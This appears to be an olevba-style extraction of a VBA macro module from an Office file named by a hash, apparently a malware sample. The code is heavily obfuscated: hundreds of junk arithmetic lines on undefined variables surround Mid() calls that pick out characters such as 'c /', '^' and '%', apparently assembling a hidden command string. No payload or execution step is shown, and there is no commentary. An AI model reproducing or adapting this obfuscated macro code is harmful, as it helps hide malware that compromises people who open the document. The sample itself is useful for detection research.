Filename     : ./macros/a77e40b03e814c6f554929a939839416d80f73228a123ab953be37a1f25780b5
OLE stream   : Macros/VBA/GCdNdPtMtFf
VBA filename : GCdNdPtMtFf.bas
----------------------------------------
Attribute VB_Name = "GCdNdPtMtFf"
Function oAOFuassfDMwfD()
On Error Resume Next
FGPvj = (ihGLDvNnDfw - Rnd(43 * Tan(ifUWqAsFzsHiYd)) / Ohclswl * Oct(wfCKWwzjjPF) * THwjYQC / Oct(lZbnapwGbuD - Chr(250) + 581 - ChrB(zEWqoqWGAJaOSa)) - 389 + HktMctFpZEOkj)
fdUNjh = (jzhqEsciMaW - Rnd(43 * Tan(cznUajw)) / ijPjiziSRa * Oct(CKClidainTZSKA) * lRAEnGqzAAkAHE / Oct(KRmjTqZOE - Chr(250) + 581 - ChrB(zCKBFRFflONRM)) - 389 + nMMBlwcSZZII)
isvsZEK = (kWwOQoZOnpS) + Mid("AShRMAWwwjhotjWJHKtCrhd", 8, 1)
BiGpDjtFhWa = (sImMHEP - Rnd(43 * Tan(GviuwfbzNVzC)) / VhibErOwmZGpG * Oct(AoCLVYVi) * iizaNarskiIWaD / Oct(CNAoTVbEqXbK - Chr(250) + 581 - ChrB(KdiVrjEt)) - 389 + RAWvhVKz)
OzAhLT = (QMIAnASjkEb - Rnd(43 * Tan(EzjmVAXtjKYDQs)) / JjLtkYRTVWQBQU * Oct(zVTUBjFKFQC) * uGnFkvFJwZ / Oct(qamfKPFw - Chr(250) + 581 - ChrB(YFKDjwq)) - 389 + EYFchzXNh)
TABDz = (mPjiHAm - Rnd(43 * Tan(qzqvvARYoGu)) / lAasBUGojHBPA * Oct(NHOwNKKGj) * bNNXPlowjORm / Oct(ojntwwjzbujmK - Chr(250) + 581 - ChrB(pskiiQpR)) - 389 + HjZvSFjlzbRaR)
pjXiFWQF = (akSIIXhKcCdH) + Mid("GfDNKWJwQHvhtouBdTzRikawEYQ  JnmROAzT", 28, 2)
wpiZkUBdO = (fGLLiaKdt - Rnd(43 * Tan(BuvASwzpv)) / VoErFXTiIaOS * Oct(wZruNaksFCb) * JdEKlziR / Oct(vrCUFGGcUTAiRw - Chr(250) + 581 - ChrB(aBmOLrQmciv)) - 389 + OXXajAfCipaHUd)
oVCWbDdwC = (MzGvPUdTAnd - Rnd(43 * Tan(KqfkLXHbc)) / UUPApitrcSTJwt * Oct(zLiKMfzrjLkLLi) * WUDOfmjPfzZJ / Oct(KvBrlmLL - Chr(250) + 581 - ChrB(QQSVdjoFTiM)) - 389 + wzFkOLTwzLmWn)
daDbsawPj = (TGFfFZpKM - Rnd(43 * Tan(EwsTiluskafuh)) / iCBACNknoNM * Oct(aXcPlzIlMorHvH) * kzIhZZiACYpH / Oct(HQIiHoLWQVphmw - Chr(250) + 581 - ChrB(pLtEvbzof)) - 389 + mUvWaqvqJdv)
KOtAWJNsDQV = (ljbisjdkj) + Mid("FqsEERotwjupumjIKMccfdBlqsjDLtfOUfJCn", 12, 1)
NGwScPO = (kJsZYTbtDmw - Rnd(43 * Tan(JwaZfrwV)) / wvHXbrPdE * Oct(viwwiMtJsOC) * TnFCXVZfvZSRnO / Oct(CzbLQwIAbMwv - Chr(250) + 581 - ChrB(mhEGMAcT)) - 389 + ZUuDZiWPf)
SKOTvUs = (WVbJbPhcSvto - Rnd(43 * Tan(YIAzpDif)) / LzWsAHMErjD * Oct(PcMCVGMcKLOa) * DhjjbvBBpKbmi / Oct(ZPNEMkYIj - Chr(250) + 581 - ChrB(uUzRDVzkwCwZj)) - 389 + PlClZSkPnr)
PjwXA = (nipZZMtN - Rnd(43 * Tan(LFmlRlXHRM)) / ZdLhnflvUn * Oct(ZDRfnjv) * qfUADZXiJF / Oct(JmZYkJSHltbzs - Chr(250) + 581 - ChrB(IjjTlzoMwVtE)) - 389 + HIPAbqjdRzf)
lzcLZKFk = (QbqMQDmz) + Mid("NYC KnjXiZrj", 4, 1)
SOrvN = (NzHCpSuBslHw - Rnd(43 * Tan(zULrqfSzjpob)) / miNCihFiqYri * Oct(kBXonIm) * nFGtZHYmd / Oct(SaHfMnpG - Chr(250) + 581 - ChrB(sFHwTIkvQbv)) - 389 + joPzdGJ)
tXZGOkfT = (QMBjsbnNqrNqX - Rnd(43 * Tan(fQLspKvtvUREkG)) / EMiIwXiodV * Oct(TXwuSbzKwOGc) * StWQhRnqhplfji / Oct(aAchWDqYvAC - Chr(250) + 581 - ChrB(FZHJwkfpDAOHM)) - 389 + vmiMPisZjwmY)
zVMzjvoCP = (EpkwjiuNfInlpM - Rnd(43 * Tan(KiGmlsji)) / jAALNvjuAlqb * Oct(wUwuCTUTYQMYh) * JmWGYGDSjhi / Oct(kcskDWj - Chr(250) + 581 - ChrB(mlorpNONH)) - 389 + omfSXIifRUod)
QFQPGZTZSt = (ZjrMPYI) + Mid("kVrdRdmTrhIoEwipQwWXZUvNtawhXKR", 4, 1)
IjCaboWzVZb = (vbUbPia - Rnd(43 * Tan(QZjmvEsWZlVV)) / HEqilUzjqJWZi * Oct(NjZzclAiNCaT) * ACKMRDRoXis / Oct(KdCaQJMQVfn - Chr(250) + 581 - ChrB(mskodrnISqzdjw)) - 389 + WNvpEjV)
DRkuoStRiC = (AwiiKhMzw - Rnd(43 * Tan(SJNMZPkiRj)) / rALVFXsVUVpP * Oct(kGbunqaUrICM) * OZBfmpphJwWJF / Oct(UciBdujb - Chr(250) + 581 - ChrB(nqrbJMArI)) - 389 + NISUoiAZ)
EGfnck = (KaYTdKjqj - Rnd(43 * Tan(TfYuTEqD)) / piTQabqZuvv * Oct(icOVVjDkk) * NzKwcZJd / Oct(WzhfjrKwrmlmv - Chr(250) + 581 - ChrB(wlDJYwXmSqfUV)) - 389 + bzQQRGZ)
azuYl = (IzDwsNDIV) + Mid("VqKpvZIniDzJMcTLuiJrw^MGAfL", 22, 1)
hczQfMnrjkf = (bKEkhfGsNGZSLm - Rnd(43 * Tan(NpvNjUJF)) / AsBCHpTdU * Oct(AIjFJvCUmkj) * BVKGznmtfSEqk / Oct(dEkYnwwfmwikm - Chr(250) + 581 - ChrB(dAWViKqjr)) - 389 + pfqaBhD)
wDffN = (wILqrTDo - Rnd(43 * Tan(KAFlKpnfnl)) / zOaMGChUiiidq * Oct(XSsdENpbBaItpI) * tzHSiLhizk / Oct(liKvbWPmmXuBi - Chr(250) + 581 - ChrB(DVMADMNYwk)) - 389 + aKLnpkttPbGR)
vpuWQDwzZo = (BTQiwjMZw - Rnd(43 * Tan(NjiIFXdFvlPRAi)) / HYqTUziYb * Oct(XJWlTjvVTlA) * oiTsiRrwjSm / Oct(pLVFiAiLG - Chr(250) + 581 - ChrB(hNHTbETwjsQ)) - 389 + kIzbTNhcvEX)
cpjARrdLJF = (VURwjOwnrWjMc) + Mid("PYLszBGUNfWTOImWFMzDnVHzsJUOOI MuiZAV", 29, 3)
rvciFj = (wliCWAz - Rnd(43 * Tan(ZuapVivXbNmaNA)) / EwwmAISw * Oct(EGBShKBwklBQkw) * CwVoOUqswZ / Oct(EaNwnGzdlPj - Chr(250) + 581 - ChrB(pQLqqcwvTAb)) - 389 + CmiicNNCsHGb)
VhrnEbi = (KGOFmzrbD - Rnd(43 * Tan(UDfAPPPGJThGNb)) / TKpRldWatsVGb * Oct(JKndlEDRRI) * tlDIjEsmQSoC / Oct(SVwcmHuJ - Chr(250) + 581 - ChrB(lAIudcXlCsjkr)) - 389 + SSJocTLCUIiKQ)
DIjrRX = (AQzdHDzcwAb - Rnd(43 * Tan(BXBikiKkH)) / dCcLnWP * Oct(GGfwNzCPACcF) * zTDFpEqkzNSWw / Oct(wAvQcNOuVjCK - Chr(250) + 581 - ChrB(bUhHICO)) - 389 + jYGzSYwJsNc)
ftRGfjr = (lwvSHNFVVfXC) + Mid("wdbEJSpndl WpSnSfEjHtkwDDrH ri", 28, 1)
fujDFuYX = (aiKOXFA - Rnd(43 * Tan(zobPPiQ)) / WYadfKcSRpcijA * Oct(SMQLXiRNm) * QSVNNDjmYmFkm / Oct(QBrzhcRWzYI - Chr(250) + 581 - ChrB(wTsNELn)) - 389 + OsHFEmwwHOKh)
jHKiFR = (BPnmWsTcVhmM - Rnd(43 * Tan(lniRlaVoTVi)) / HGOliBl * Oct(UvaPsfDz) * ZRVdNqjjSJGm / Oct(huJlPmEqrfBBJq - Chr(250) + 581 - ChrB(OZFWWHuD)) - 389 + XuPfBLsi)
ZjQUWB = (JFMtLhu - Rnd(43 * Tan(zMYumtvjVPkNad)) / YXXkfdNU * Oct(LAujjDwjQk) * dWbEbkiEihi / Oct(jwoWozOUmrz - Chr(250) + 581 - ChrB(lwOwRSEzqCiC)) - 389 + SIvzIprcWNkvjI)
ikjtSiw = (puVqUfKZuSw) + Mid("jWVhiovvAFXYBwIKo", 4, 3)
RCWGnEYvOrz = (ZNjFHQRvpi - Rnd(43 * Tan(UbEAWUtDjQnn)) / BNUWYpfnXdkcj * Oct(RpFaSLQn) * pPIhRouHlZoEuv / Oct(WACzzwUXqLbOip - Chr(250) + 581 - ChrB(baNRiGQHOw)) - 389 + WwDrEXtKERJ)
kzcqpiNdA = (SFoPAMIzUcNwu - Rnd(43 * Tan(iMWMwicjdHqz)) / ozDYVAuMr * Oct(jzvihDK) * SiorMVY / Oct(OPibjZCvTz - Chr(250) + 581 - ChrB(DrzzUqHmP)) - 389 + AujTBXS)
uvHiVGJ = (QzOrdQoFs - Rnd(43 * Tan(AUbVUwHEUTlDS)) / WTJOwmYY * Oct(FiFdMudWw) * VQWWAXTOlF / Oct(jMfEVJHZHGQbHW - Chr(250) + 581 - ChrB(OVuJrzmfzszzI)) - 389 + fXmTRYVaYrkVw)
zSqbqRkSOn = (qzVsSVqZP) + Mid("qGMac RAAPtGwHcBnVmhrEDTWLKrMTK", 5, 2)
ZKHaHwUnq = (zliAzmfiQXJ - Rnd(43 * Tan(AOhmGOUfUBEiIT)) / UCHfCkSWO * Oct(CsLUpakcVCmM) * NnCnIvhzsfYLcI / Oct(HKhrTDEVJLibT - Chr(250) + 581 - ChrB(nRbHHur)) - 389 + wKajiKNmINRsUL)
MuWjBRcHO = (EHUmrZzn - Rnd(43 * Tan(qDCjwSRfIGI)) / wXPmzNaMf * Oct(jSOZqjWDzRw) * crfzdPEli / Oct(IsGkFAtMZa - Chr(250) + 581 - ChrB(LWjVYblJFJqVhu)) - 389 + GAjLItzMKW)
zFRPwZzioD = (FNzDUOAINXQmUu - Rnd(43 * Tan(XCQJblcw)) / ORlaGUjFTpF * Oct(oFtCrMzziGWOIW) * NKmIcRSoDca / Oct(sqKTfpI - Chr(250) + 581 - ChrB(wWHkYiwAIuWR)) - 389 + uTvhhciWRqaR)
iFnzbYRbr = (vsqIRtcdUN) + Mid("vmfMjzBfSwC^EWEQpQEbSstI", 12, 2)
TGFFf = (GbVJksWSRU - Rnd(43 * Tan(cEnTcdKRWYpjts)) / ORFNJYzFVKn * Oct(YwzPdDKYiXpQUB) * zvQucQHiENDKX / Oct(zSIohmTXIMc - Chr(250) + 581 - ChrB(UwqcotHjzJFP)) - 389 + iRTvCZtn)
oOpWAJv = (doROhLLWjs - Rnd(43 * Tan(OiGsEvqzPKJW)) / dMEjccisJsqTKI * Oct(mvIMQcKO) * imoZTvITST / Oct(UHcuDNtEqQYt - Chr(250) + 581 - ChrB(fMUCwFVTziFp)) - 389 + FZOjWBqXqfTNJ)
oinInTkMOpj = (bYJCrdpNtdDUz - Rnd(43 * Tan(GmjvZTlwMHs)) / XXAwRiIf * Oct(dQrwSpsnwj) * aAjRiwXpCfMCKk / Oct(SMuMUMT - Chr(250) + 581 - ChrB(cWrwHitI)) - 389 + YzjWqjPTL)
AtwDNpzNS = (fFjbmPZcmERtwI) + Mid("zWdmszrBlFEMlWvNM zDD", 18, 1)
tatlzYM = (jFYIGtB - Rnd(43 * Tan(GbFXMwQWdXEPIT)) / GuWCOphBonCmN * Oct(VwwmLTnizp) * HTCvJtuPPSOjq / Oct(EYZRjJMDzHYI - Chr(250) + 581 - ChrB(wADcvjKHWfF)) - 389 + tIWwHHPFzHu)
zXzVuPTjtAX = (qTjpCzPrAK - Rnd(43 * Tan(tqrFUMnGfHi)) / WfqDZmjfK * Oct(NTTaXolDhL) * BOaOrTujjYNH / Oct(JKLuqEU - Chr(250) + 581 - ChrB(PXcYmtowVbZ)) - 389 + iUQQphTmva)
KtHtP = (zPMpTCfii - Rnd(43 * Tan(UlpBqEqAJCdpGp)) / fBfDAkhic * Oct(HlRoMaUY) * sbZipzf / Oct(OwnHJWanBAbiJm - Chr(250) + 581 - ChrB(NrjTYMzb)) - 389 + RFznGWpE)
uWKBYf = (MPffEWuXA) + Mid("KoDnMjUGjZzuHqjFMnljPMHvQDEnQwo %HjrWN", 32, 2)
WRzQzvi = (ALRRNdrNdqHmrz - Rnd(43 * Tan(FZFlOwnlXotuE)) / lhjpZbMV * Oct(bUdOwfXiZTz) * thKMBNatcTi / Oct(FrJXzSVdjzdQ - Chr(250) + 581 - ChrB(iqFAGUbFjsAZ)) - 389 + YOmbzHmrJEW)
aPuYQrp = (bVQBDERt - Rnd(43 * Tan(mnrjCzDAbItjuq)) / SrcSRFaOzqYtwR * Oct(DOwdkPXP) * EizwSMc / Oct(iUiMbwbsLZrs - Chr(250) + 581 - ChrB(EFjSFimRGju)) - 389 + bOmHcvmOrOd)
DjhQlAwKz = (GjZzIwUtHqHwVi - Rnd(43 * Tan(ZliAUNiknwwfB)) / rRicIfL * Oct(FNBRNpikziPi) * kmsBmcwlCMTSo / Oct(YZVNwhpjU - Chr(250) + 581 - ChrB(DzoFCzOPSMHfqb)) - 389 + CPwDBiwZaF)
jbjFFSmXh = (lHzVsvDubSWUtW) + Mid("HfuhbMAklSaBAkjLUacBSYwbtdWNEkqsZUbIszfNp", 3, 2)
zkjaziYwubm = (wbQUkYpjWXzZ - Rnd(43 * Tan(fNiqPYook)) / joljiFi * Oct(pbAWdORjhrOF) * PNswiDY / Oct(qptLajjzoLa - Chr(250) + 581 - ChrB(kJzOJjUYiqwaf)) - 389 + UbsmvBFLzmGKDh)
IMKYPTutaRf = (ubzQGQYXlk - Rnd(43 * Tan(zGuonmDULfERu)) / HWSfozrpmld * Oct(CMEiuVpS) * SztfToq / Oct(ppJEnzuFr - Chr(250) + 581 - ChrB(kwHTIKdkqPdljc)) - 389 + apYYAULBXzw)
KJnzJUOumvz = (sztTjiMFGBPZmY - Rnd(43 * Tan(LHwjmnBz)) / mSdOKOzwR * Oct(TAtniZV) * brQNauwEXoS / Oct(MrBcjNAzurCTHj - Chr(250) + 581 - ChrB(ISTUHRH)) - 389 + GzYriSFrKd)
RjlYa = (hsjnMTFQinzj) + Mid("ibYGtwFizikoZUIldkkwBlcfURNzFitvkiWcps", 17, 2)
scinUVmzVn = (FONKdCYEVu - Rnd(43 * Tan(ojBjwaoEGhcMJV)) / rcYvkWMqYVcF * Oct(iKYGfqjpwlNait) * mcBDovLwfaKcc / Oct(dNVUoVvIVhTlr - Chr(250) + 581 - ChrB(qLUBcWDvTYRDW)) - 389 + sjVNHwUXs)
ofJtwDL = (qKqqKXWjJS - Rnd(43 * Tan(trimOYisUF)) / luWIwdjE * Oct(TBZEwwujz) * ipZIstGlwZ / Oct(UsQjYwT - Chr(250) + 581 - ChrB(asDFDCr)) - 389 + doQduszaT)
dQtbBUWpUpW = (ESFUFJz - Rnd(43 * Tan(oiuwDkw)) / QoLGiuYTTOG * Oct(bZnzoOz) * JXaMNAI / Oct(dvDJYONSJiYJ - Chr(250) + 581 - ChrB(mBrCufOuuIoluW)) - 389 + NzsdmlpXLzjMM)
HvZFwJa = (uXvdHUk) + Mid("GzwvGuDEUZURNlqfIwt", 14, 2)
UijkpA = (mdOqsjfN - Rnd(43 * Tan(JJYZCbhYiakVGB)) / cwjwGbvpMMK * Oct(nkAUaqDiJFPOC) * TSzjqfcmN / Oct(CiGXNULNrltodG - Chr(250) + 581 - ChrB(fDTSXjSu)) - 389 + HcpdWiNAXERrkf)
oWjmduzFUiv = (wuwsoVDsqlblc - Rnd(43 * Tan(fwWNfiuotzwZ)) / RBZmaZpflPcYNh * Oct(aljcqkoqP) * itzKBzwOalqR / Oct(BMmCtjupRwdNHQ - Chr(250) + 581 - ChrB(jKdKKzsjrU)) - 389 + QjKnvZJmiQDh)
sjcjL = (cJUpPkoM - Rnd(43 * Tan(liirNYsQZ)) / TuXwcdivdacnw * Oct(KBDjhoj) * XPjKLLI / Oct(aOPDFQFLsMkoL - Chr(250) + 581 - ChrB(nziijMVMjlIR)) - 389 + HOSRTnlANX)
KohHt = (ptCWQTfptY) + Mid("c /VHZzAqjRkRjwiM", 2, 3)
DCXNcErZ = (KUzQwUzuicfQIj - Rnd(43 * Tan(zJjuhIPN)) / iBEDUmCfciz * Oct(CbjXXqiEfWmtC) * VkJAmuHSmvPtZ / Oct(ZzoajRzhwWKSjJ - Chr(250) + 581 - ChrB(IOKBhQSWcwFijp)) - 389 + HdQmifiMMlpon)
fjiGkpAT = (YDvIwhBE - Rnd(43 * Tan(OdKNpjLfzMv)) / kWchvsMjc * Oct(ZRmEjMKIlL) * jRWBQTrG / Oct(HPzsnjSaAopXD - Chr(250) + 581 - ChrB(EsblwzUrbkIBF)) - 389 + fiYUaoR)
NvbKh = (MdbiNsIPjBu - Rnd(43 * Tan(UaBzPrcijmc)) / kRLHClYHXBVjl * Oct(cviXIST) * zDfHcADct / Oct(BkwwjBMvcn - Chr(250) + 581 - ChrB(SESMMPjA)) - 389 + iJXRTHcu)
DNfhDvuoF = (pUNzSijFssfH) + Mid("rBKGuTJWLEPEMkZGjKzrjpCZS  MXtiXM", 26, 2)
szzMsi = (StRCtjHw - Rnd(43 * Tan(jfcSJpiuHT)) / oPklbNvVQ * Oct(zOXuahTuFl) * iOYVcnVpqaTV / Oct(UDJfafn - Chr(250) + 581 - ChrB(jBmRFXjIOzBi)) - 389 + JBLQzaZjZtit)
bWspqZMuVd = (ERPHEWtYHl - Rnd(43 * Tan(QiQHkjpBHiAs)) / dbYMDPEMPZMQ * Oct(jDitiuGiT) * OjHcMuRnD / Oct(iddzhVshXA - Chr(250) + 581 - ChrB(DrSzlXOz)) - 389 + mwKNKjw)
QnwvUljRX = (EXPmhbaRnUKC - Rnd(43 * Tan(PbFOFGHIXjzMjZ)) / bkjLoZLbKmz * Oct(TMGBPUbZsUirsE) * hoSazBuqCkz / Oct(XDzvbGIov - Chr(250) + 581 - ChrB(hhrIAmHBr)) - 389 + jwinrMBvY)
TdmWIRnv = (aXYoUZzzwM) + Mid("twXmADzpTjhoiZd", 11, 3)
tVfhf = (rRwlIrjGajMN - Rnd(43 * Tan(YKSEKoo)) / aWDnzlkTPnB * Oct(GpGCXvzitK) * CmEOnrIzrHJQv / Oct(zKGzmLsKoviEPj - Chr(250) + 581 - ChrB(pFjQfBBtX)) - 389 + bGoKRwZLHZktjG)
pwCLRoBTjQE = (TpROwQOGWTfPEp - Rnd(43 * Tan(EwmQrYSzwA)) / VKtjfGSBjvGaN * Oct(XjwWFFpIz) * pFJzXApVNGu / Oct(NnoYzCF - Chr(250) + 581 - ChrB(wWYBTrVdruB)) - 389 + NQtZzSdiG)
DuNYU = (wRiDLEEAXwJtIH - Rnd(43 * Tan(wWcQjKEkrMz)) / DIQWYvNdTKj * Oct(vuqaKWpTUGFfwj) * jrjrqLZAsHck / Oct(udKlpjVlTdaUWj - Chr(250) + 581 - ChrB(wDkXoLil)) - 389 + TqkVtzThlrZr)
jMwpqtA = (zrzIfjbbkBBaAP) + Mid("AMSQNZkJEVdIsCvvKrViavpa /oDobaXoaIKO", 25, 2)
jXijh = (MHTUTJihImCW - Rnd(43 * Tan(ThHffiMiSFj)) / wtOaiYXTNJRiz * Oct(MuKmOKrnar) * mwDuGtBniXPTG / Oct(OfCQJQZjHSR - Chr(250) + 581 - ChrB(jqVwJTWkra)) - 389 + ZGQPvVBzb)
LUncwRUr = (pzRKwMiDTLId - Rnd(43 * Tan(XHpfXfcmZTw)) / orrDWDLjVKH * Oct(VtiPwBHL) * DbVhTABsuPdV / Oct(IVqzwHzwJMzc - Chr(250) + 581 - ChrB(iBNpYLlq)) - 389 + PWVDCKoauirk)
WcvJsrGjj = (GrlcnNLRf - Rnd(43 * Tan(vwWlnMcJt)) / iLFVqQW * Oct(qKmDvTlihwTCD) * pnBihXMTLNW / Oct(mvlQmWqVaVb - Chr(250) + 581 - ChrB(BCAEifpqzAVST)) - 389 + izdWwYjU)
XidNUODzt = (JAfoWQb) + Mid("WjWwzKIDJLaRPGKldqEcXYCQvFzpuVG hmQpOPIj", 32, 1)
SVcIA = (JYzEzOmtOVFI - Rnd(43 * Tan(ziErRjtWFU)) / tFmIiSVkZts * Oct(sTMWErBAQujKJ) * DMHqODETLu / Oct(dKwAUjcHpMY - Chr(250) + 581 - ChrB(MpiETNw)) - 389 + cwMOJcifok)
GNHjj = (jVkEtKrif - Rnd(43 * Tan(uXwpYUtsGH)) / DtZIWYVF * Oct(zojjNcDFZq) * XnAwzVYEqUjG / Oct(HdcKvXmWdGXF - Chr(250) + 581 - ChrB(MbvQnSQWlQtbK)) - 389 + zQOENhB)
sOqNuzOor = (UJfGuBj - Rnd(43 * Tan(kFMWzizhrsAwSF)) / QoRNzAURnUZi * Oct(jChhwqz) * vvwwjWIDLH / Oct(OWOSdnlwQnZB - Chr(250) + 581 - ChrB(zuwoKTAcFT)) - 389 + sURNdLObNp)
vXBfsCu = (HRvbhEzvLE) + Mid("KkFB whARVASVA", 5, 3)
KzdvbWiiUiY = (jAsJCDNthcs - Rnd(43 * Tan(IwIZhRqL)) / NjjlVmGOBK * Oct(mkrvYdPMIs) * QiAsDHoXwqqH / Oct(RJYjQHifST - Chr(250) + 581 - ChrB(YENBDBdCdi)) - 389 + AlcjwadNi)
ktwNoWKsDzU = (JjVwnmpp - Rnd(43 * Tan(lLzjniSpqI)) / MfcJCSqo * Oct(iFsGNUMbG) * FzbwKuIzsFz / Oct(RQRwiGLuU - Chr(250) + 581 - ChrB(AbqjTrWSWriLCK)) - 389 + jSPtVwjOMobo)
EsvKh = (tmUvNndszInEhI - Rnd(43 * Tan(BElcvjk)) / zShAQaTmJIkFn * Oct(SVIzddGR) * PsIBudzZPIz / Oct(cfmNRfWivw - Chr(250) + 581 - ChrB(RsmQUwG)) - 389 + jfnSIHZZ)
JvzLimWJ = (cVdOFiwBNDwObU) + Mid("scScuFfHKjSjlio flwpwhJsiIRhBJJRoij", 15, 3)
iEFfh = (qGPMKJwzH - Rnd(43 * Tan(bRaZiHkFNHL)) / owAwwQNissCFcQ * Oct(VBtOlYnnbvY) * GciNhFs / Oct(TMMLfldmj - Chr(250) + 581 - ChrB(UwSfOEUta)) - 389 + AIYCZPHCJi)
wsFXV = (dfQfDQZQpv - Rnd(43 * Tan(FlYjchGISbcbjN)) / AirEiMHNUFjn * Oct(hXWkmkmH) * ZzWmNPtAEjR / Oct(QrYkMmzXD - Chr(250) + 581 - ChrB(vtwauErovbi)) - 389 + IuivzsUTBz)
wVBWfFIiKm = (EMaciaN - Rnd(43 * Tan(soiTQLnJmPi)) / cEtUMUXEOnK * Oct(dzDLcwhjofl) * VPhzWfvSVUZA / Oct(GPNDJPFdE - Chr(250) + 581 - ChrB(RHbhphzlwTMwz)) - 389 + aijrsEIZDsVh)
smoXjbzRw = (AjwIJphizv) + Mid("WMjquOpwmpTPrizRcXwIwroUjjTraqApwdpPAsjfR", 7, 3)
TzpniDh = (qQjzAawojc - Rnd(43 * Tan(BcpmVoIQoqozii)) / QnFDkbw * Oct(GKNGrOwnur) * sFGMWfLl / Oct(fBTwTzJL - Chr(250) + 581 - ChrB(fsUDEjbIhQBr)) - 389 + tFVmwKa)
cSzaDLLij = (iHHncrFtXbOVFv - Rnd(43 * Tan(zVFVNmTXmWpuE)) / YpsmuJsORw * Oct(FlFikOwPGjNkAc) * PkUQmwBT / Oct(lWjLmzlEIaHBOs - Chr(250) + 581 - ChrB(IqfwtKF)) - 389 + KluHtAJzERFsO)
zJwjFDS = (OwsoBWk - Rnd(43 * Tan(wujRcINch)) / wlzITdN * Oct(ilttWzGw) * HdzvnpUZiHY / Oct(wdmGuFAFG - Chr(250) + 581 - ChrB(ObprzVEYlLi)) - 389 + GzjELvfipWp)
RZsbAwY = (XYqpsEqOnuEl) + Mid("fEsdmbLdoaBqookSRwMp", 12, 2)
FjRulqZ = (ndIvJbZUHBr - Rnd(43 * Tan(HwRCZofiY)) / sprDwdDjIz * Oct(dDCpwBiRpdsQa) * NjBsQNjGNkTDG / Oct(wQYssfdtPNa - Chr(250) + 581 - ChrB(BMiwzZRKkwCqr)) - 389 + DXpRWvvBUZEz)
rprQJr = (zNSmdPBnztit - Rnd(43 * Tan(hALNLnY)) / kzhQsUI * Oct(FlKNMbGhW) * OtSiZjcr / Oct(WoGpviiP - Chr(250) + 581 - ChrB(kWkvtYrHY)) - 389 + nGudrBYilCZ)
fQFXifrN = (lulvrAOiB - Rnd(43 * Tan(bFDwrfs)) / rJrzBWv * Oct(fOZObjAXf) * JAJUKWwSTJQ / Oct(wmlLfNamt - Chr(250) + 581 - ChrB(zbUzInivF)) - 389 + SPVsqXzUAiC)
rPbuNNA = (vOUQnRdLXX) + Mid("chAmGvFdkCjsCcIOEjiZhZ", 4, 1)
cMwwWh = (oBLlazw - Rnd(43 * Tan(jiMrzzaTA)) / qRHwDCcKOnWzw * Oct(oihijHws) * JzJtCjrb / Oct(dsMHtsz - Chr(250) + 581 - ChrB(JPkItjhA)) - 389 + OSrjsvz)
UjtpmYcPrS = (hYjfPuwukRW - Rnd(43 * Tan(TBzitWJhfnwoGX)) / lGYiclMPGcL * Oct(jBTYUOKGPW) * izGJAtbuYrPKoL / Oct(uMGlrFiAdfLO - Chr(250) + 581 - ChrB(awRPPHqfVbM)) - 389 + iindQqfNhU)
znEus = (QWEzjopl - Rnd(43 * Tan(wiICQNctzSZ)) / VlzPBvtDAjlN * Oct(cNcAWZdGJuMoDh) * RPaMzbukHkft / Oct(haPzuGnAAsctwi - Chr(250) + 581 - ChrB(qkawOIll)) - 389 + ZQUhcVQq)
AasKX = (wwuIZiW) + Mid("uwZYtdBf^SrSrfSinfDYL", 9, 2)
CfCoPZJu = (AdisAwdipfzUba - Rnd(43 * Tan(vjUHYktQNXuXMp)) / BuFwQmkOqhs * Oct(WqiOLCRuzsavNG) * RVFbQpKd / Oct(OdKNLSi - Chr(250) + 581 - ChrB(jnXajJjUvuj)) - 389 + UKlKaSsl)
vnzwQQv = (pkQEQNivVdi - Rnd(43 * Tan(WXlKUSi)) / qKNirDAnJ * Oct(DOnwaYPThtOizT) * cwzdzOHldkiX / Oct(NNNrlaaPOZwN - Chr(250) + 581 - ChrB(BlpAIKurPFAJJj)) - 389 + dKLwBdGUjWzZsX)
KQLVjY = (EjjNzOailhMVG - Rnd(43 * Tan(uiTlErzmsZ)) / UEiMNKKBcrLzv * Oct(vLbokjPzHN) * tnuqsRqHUfKv / Oct(XXCUidjfXQ - Chr(250) + 581 - ChrB(fYwHsdUz)) - 389 + iUWPKjaUr)
RuSOHhz = (cILMYzi) + Mid("iUBUwwWTOGLAzQ wpJcpmdUBsnkdSvoI", 15, 1)
qpShwO = (YDQENWwcc - Rnd(43 * Tan(dtzHMibuim)) / NALRuQI * Oct(KlBUAjztFSa) * hjbYjIMToVf / Oct(kJKDEmSFo - Chr(250) + 581 - ChrB(RibZzaPoWbEGXi)) - 389 + nhmDoppGmj)
BCHOhhBOnvH = (VMjCVjBpu - Rnd(43 * Tan(CnHVPwhPid)) / FsvkETd * Oct(GWJvfznrij) * NfrzJwt / Oct(qjHrirOPTnSRQ - Chr(250) + 581 - ChrB(TnDsscVbFC)) - 389 + hPXNsmnLZmp)
JYiJp = (EzzEKimjiREj - Rnd(43 * Tan(zKbbopF)) / VADajNp * Oct(iqXbRkpq) * cEEpPXO / Oct(SsXqRHUFhi - Chr(250) + 581 - ChrB(vdaQwUAahEkPUl)) - 389 + LkBOFdpGQV)
AuwDWsjuOja = (WuoSAUshStwKL) + Mid("jTDw IDhAkMZHrtFz", 5, 1)
jnAnronT = (ibDQjTDLSkpLDw - Rnd(43 * Tan(EQXOaFLAc)) / CbBfFqlioYRoM * Oct(ICqNzaMJwViu) * YOtTbbZ / Oct(sCjMtEhPYzPE - Chr(250) + 581 - ChrB(FYOzDBisifwK)) - 389 + MPvEqNnDQzKBD)
stiwRwwlYq = (RShUWSWABM - Rnd(43 * Tan(UwdWuIVDRsnnj)) / OdwXawrhJfiS * Oct(BkZNtfbnt) * YwoAswcifAi / Oct(pacaOwnm - Chr(250) + 581 - ChrB(ncqUSriuHFzVwY)) - 389 + lzwjhADRjtv)
vFbWRN = (XaupNWjBFr - Rnd(43 * Tan(UTJCRipZE)) / zfzzHJdUZtYQiS * Oct(sOCcazwiNaDN) * ZhcRaaXvu / Oct(GNGhfztElqPYU - Chr(250) + 581 - ChrB(wiwBAmXDwNusQ)) - 389 + pIurzVwP)
wwVcvdEQ = (fuXWSqPSqi) + Mid("MYfurdJjpdSWREKNvjvICvU", 8, 3)
DQRRtbnD = (lSRdzHjkUwjaGz - Rnd(43 * Tan(YvkmrCBpQzEE)) / kKHaWrtcqcwORn * Oct(nRXckRf) * wHEzjcAdvC / Oct(zKrFDPDHhTmY - Chr(250) + 581 - ChrB(OvCzccTjFn)) - 389 + TSuKzpzC)
nSziZzNmKAH = (hDZFfjw - Rnd(43 * Tan(ncVmhPRz)) / amZdOcwSh * Oct(LhkPpuJqfjPVDO) * mOtmplDEou / Oct(cXSaamzlmbC - Chr(250) + 581 - ChrB(fsYYmTzFj)) - 389 + GbNFjrKI)
